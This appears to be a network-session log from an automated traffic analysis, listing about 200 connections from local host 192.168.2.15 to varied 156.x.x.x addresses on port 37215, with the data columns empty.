                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23380192.168.2.1547524156.181.86.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23381192.168.2.1543650156.78.169.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23382192.168.2.1556602156.246.227.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23383192.168.2.1545582156.212.112.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23384192.168.2.1541836156.34.24.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23385192.168.2.1537474156.120.78.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23386192.168.2.1557174156.253.174.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23387192.168.2.1558092156.193.220.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23388192.168.2.1537244156.140.237.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23389192.168.2.1560196156.127.5.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23390192.168.2.1558400156.199.164.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23391192.168.2.1544676156.177.225.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23392192.168.2.1541264156.75.115.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23393192.168.2.1556042156.87.50.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23394192.168.2.1551576156.112.71.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23395192.168.2.1545418156.188.145.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23396192.168.2.1545170156.213.139.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23397192.168.2.1553684156.131.239.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23398192.168.2.1550828156.92.228.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23399192.168.2.1546040156.117.38.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23400192.168.2.1542770156.235.249.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23401192.168.2.1558454156.245.137.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23402192.168.2.1558716156.178.113.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23403192.168.2.1548942156.158.73.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23404192.168.2.1538926156.0.107.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23405192.168.2.1547732156.143.34.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23406192.168.2.1549758156.222.239.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23407192.168.2.1535916156.176.158.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23408192.168.2.1535014156.90.71.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23409192.168.2.1534724156.161.7.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23410192.168.2.1557204156.131.51.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23411192.168.2.1538054156.168.70.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23412192.168.2.1557284156.30.143.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23413192.168.2.1535038156.83.79.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23414192.168.2.1540494156.169.84.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23415192.168.2.1534966156.212.113.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23416192.168.2.1550794156.6.221.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23417192.168.2.1554276156.244.147.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23418192.168.2.1534958156.189.30.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23419192.168.2.1560378156.80.77.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23420192.168.2.1552252156.191.213.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23421192.168.2.1535122156.237.112.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23422192.168.2.1543610156.149.61.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23423192.168.2.1553736156.204.56.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23424192.168.2.1542710156.63.124.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23425192.168.2.1556450156.33.56.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23426192.168.2.1557978156.143.128.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23427192.168.2.1540496156.54.120.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23428192.168.2.1536266156.56.212.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23429192.168.2.1541094156.23.236.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23430192.168.2.1536290156.11.147.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23431192.168.2.1542328156.185.124.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23432192.168.2.1553462156.183.19.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23433192.168.2.1552028156.182.255.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23434192.168.2.1544702156.46.143.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23435192.168.2.1543292156.196.54.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23436192.168.2.1541322156.101.4.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23437192.168.2.1560768156.244.158.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23438192.168.2.1549078156.188.178.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23439192.168.2.1542850156.179.216.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23440192.168.2.1538622156.98.44.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23441192.168.2.1542268156.234.163.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23442192.168.2.1551680156.249.174.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23443192.168.2.1536700156.22.8.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23444192.168.2.1557806156.65.232.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23445192.168.2.1549678156.235.200.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23446192.168.2.1536476156.61.221.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23447192.168.2.1552130156.59.48.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23448192.168.2.1534164156.26.16.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23449192.168.2.1537488156.210.101.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23450192.168.2.1535192156.198.231.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23451192.168.2.1534554156.192.209.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23452192.168.2.1554182156.171.70.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23453192.168.2.1545818156.212.122.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23454192.168.2.1543460156.42.244.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23455192.168.2.1551972156.179.75.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23456192.168.2.1559322156.146.178.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23457192.168.2.1557946156.118.200.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23458192.168.2.1550500156.242.27.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23459192.168.2.1542934156.14.17.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23460192.168.2.1553898156.232.253.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23461192.168.2.1558990156.161.205.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23462192.168.2.1556294156.125.235.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23463192.168.2.1555268156.120.92.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23464192.168.2.1546126156.181.170.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23465192.168.2.1554850156.169.145.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23466192.168.2.1553396156.58.191.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23467192.168.2.1534002156.49.190.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23468192.168.2.1538520156.153.148.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23469192.168.2.1544082156.75.46.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23470192.168.2.1541082156.190.118.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23471192.168.2.1540222156.127.179.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23472192.168.2.1543854156.103.186.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23473192.168.2.1551228156.96.202.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23474192.168.2.1547974156.7.160.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23475192.168.2.1536204156.117.219.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23476192.168.2.1550844156.168.162.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23477192.168.2.1555696156.137.142.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23478192.168.2.1556932156.205.25.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23479192.168.2.1548936156.85.137.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23480192.168.2.1557380156.94.255.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23481192.168.2.1557608156.158.84.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23482192.168.2.1537896156.214.60.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23483192.168.2.1543292156.116.168.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23484192.168.2.1556674156.107.236.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23485192.168.2.1539726156.109.24.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23486192.168.2.1548534156.225.59.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23487192.168.2.1558494156.14.97.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23488192.168.2.1548946156.248.233.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23489192.168.2.1552184156.114.125.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23490192.168.2.1559478156.166.208.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23491192.168.2.1547412156.123.204.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23492192.168.2.1560968156.116.211.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23493192.168.2.1537342156.165.77.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23494192.168.2.1558044156.238.248.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23495192.168.2.1533244156.95.54.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23496192.168.2.1534616156.229.8.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23497192.168.2.1554924156.81.42.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23498192.168.2.1542314156.201.149.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23499192.168.2.1539998156.91.30.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23500192.168.2.1548102156.117.60.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23501192.168.2.1537238156.21.10.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23502192.168.2.1546034156.231.129.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23503192.168.2.1534232156.213.145.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23504192.168.2.1547830156.173.146.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23505192.168.2.1557442156.119.75.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23506192.168.2.1551840156.12.132.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23507192.168.2.1560254156.178.124.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23508192.168.2.1543742156.154.17.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23509192.168.2.1553082156.90.138.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23510192.168.2.1560374156.120.212.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23511192.168.2.1553936156.228.179.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23512192.168.2.1557968156.255.71.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23513192.168.2.1539164156.111.252.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23514192.168.2.1546202156.36.24.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23515192.168.2.1533798156.197.149.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23516192.168.2.1542558156.70.138.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23517192.168.2.1555256156.212.230.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23518192.168.2.1559564156.179.24.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23519192.168.2.1544448156.202.2.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23520192.168.2.1535694156.143.61.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23521192.168.2.1539332156.41.203.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23522192.168.2.1540038156.46.213.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23523192.168.2.1548480156.81.189.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23524192.168.2.1552980156.168.131.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23525192.168.2.1533370156.8.194.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23526192.168.2.1538522156.191.185.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23527192.168.2.1560456156.109.178.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23528192.168.2.1549340156.7.187.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23529192.168.2.1533760156.15.9.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23530192.168.2.1536282156.241.162.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23531192.168.2.1555744156.153.59.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23532192.168.2.1536364156.133.35.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23533192.168.2.1551942156.116.197.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23534192.168.2.1542462156.194.8.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23535192.168.2.1542328156.84.81.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23536192.168.2.1544712156.109.254.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23537192.168.2.1549306156.78.161.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23538192.168.2.1549888156.162.10.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23539192.168.2.1538660156.249.72.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23540192.168.2.1542704156.231.84.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23541192.168.2.1548426156.208.8.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23542192.168.2.1556444156.27.251.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23543192.168.2.1542066156.36.8.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23544192.168.2.1546772156.93.195.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23545192.168.2.1542898156.3.244.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23546192.168.2.1546728156.115.129.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23547192.168.2.1539162156.2.248.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23548192.168.2.1534310156.178.36.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23549192.168.2.1555600156.63.107.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23550192.168.2.1538942156.31.203.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23551192.168.2.1539944156.94.221.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23552192.168.2.1547648156.133.250.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23553192.168.2.1547962156.32.216.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23554192.168.2.1548258156.212.242.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23555192.168.2.1545354156.133.185.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23556192.168.2.1537140156.237.135.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23557192.168.2.1536058156.140.233.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23558192.168.2.1557086156.198.72.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23559192.168.2.1541162156.30.86.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23560192.168.2.1545056156.68.34.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23561192.168.2.1555090156.52.9.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23562192.168.2.1545824156.49.37.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23563192.168.2.1552950156.85.125.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23564192.168.2.1558090156.64.118.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23565192.168.2.1540326156.196.93.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23566192.168.2.1554914156.199.81.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23567192.168.2.1547820156.175.241.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23568192.168.2.1547244156.113.27.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23569192.168.2.1553442156.12.210.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23570192.168.2.1532910156.20.173.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23571192.168.2.1541026156.100.55.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23572192.168.2.1547910156.155.89.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23573192.168.2.1558836156.241.11.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23574192.168.2.1533544156.185.7.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23575192.168.2.1552126156.61.214.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23576192.168.2.1537544156.210.5.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23577192.168.2.1545836156.123.23.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23578192.168.2.1555754156.141.10.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            23579192.168.2.1543954156.184.45.1837215
                                                                            TimestampBytes transferredDirectionData


